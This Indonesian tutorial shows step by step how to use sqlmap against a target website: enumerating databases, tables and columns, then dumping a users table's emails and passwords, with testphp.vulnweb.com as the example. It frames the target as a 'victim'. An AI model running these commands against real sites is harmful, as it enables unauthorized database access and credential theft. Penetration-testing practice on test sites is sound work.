Cara scaning website dengan menggunakan SqlMap di Kali Linux 2.0

Tutorial scaning website dengan menggunakan SqlMap di Kali Linux 2.0 .

pertama anda siapkan korban dahulu, setelah siap mari ikuti langkah-langkah berikut ini :

buka terminal anda, setelah terbuka ketikkan perintah

sqlmap -h

untuk melakukan perintah hacking masukkan perintah

sqlmap -u (www.target.com) --dbs

contoh :

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

NOTE : JIKA MUNCUL PESAN-PESAN SILAHKAN TEKAN 'y'

di sini saya mendapatkan 2 data base 

*) acuart

*) information_schema

setelah itu lanjutkan lagi untuk melihat database . ketikkan perintah 

sqlmap -u (www.target.com) -D database-target --tables

contoh

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart  --tables

disini saya menemukan  8 tables acuart

+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

setelah itu ketikkan perintah

sqlmap -u (www.target.com) -D database-target --columns

contoh

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --columns

hasil scan saya mendapatkan database berikut

setelah itu ketikkan perintah

sqlmap -u (www.target.com) -D (database target) -T (admin) --dump

contoh

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump

dan inilah hasil scan saya

dan pasword adalah tes. email adalah email@email.com ?? oke, tetapi dalam pentesting web sendiri, anda bisa data lebih sensitif.
mungkin ini kurang jelas tetang hasil saya, anda bisa kembangkan sendiri site anda. ini hanya contoh belaka.




Sumber : http://boncelhack.blogspot.co.id/2016/02/hacking-website-dengan-menggunakan.html